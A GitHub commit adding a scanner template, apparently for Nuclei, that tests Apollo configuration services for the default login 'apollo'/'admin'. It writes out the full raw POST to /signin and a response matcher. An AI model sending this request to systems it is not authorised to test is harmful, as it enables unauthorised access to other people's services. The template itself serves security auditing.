Create apollo-default-login.yaml

patch-1
PaperPen 2022-03-11 16:00:37 +08:00 committed by GitHub
parent 99c244811c
commit e12508b6e3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 0 deletions

View File

@ -0,0 +1,35 @@
id: apollo-default-login
info:
name: Apollo Default Login
author: PaperPen
severity: high
tags: apollo,default-login
requests:
- raw:
- |
POST /signin HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: {{BaseURL}}
DNT: 1
Connection: close
Referer: {{BaseURL}}/signin?
Upgrade-Insecure-Requests: 1
username=apollo&password=admin&login-submit=%E7%99%BB%E5%BD%95
redirects: true
max-redirects: 3
cookie-reuse: true
matchers:
- type: word
words:
- "media='all'"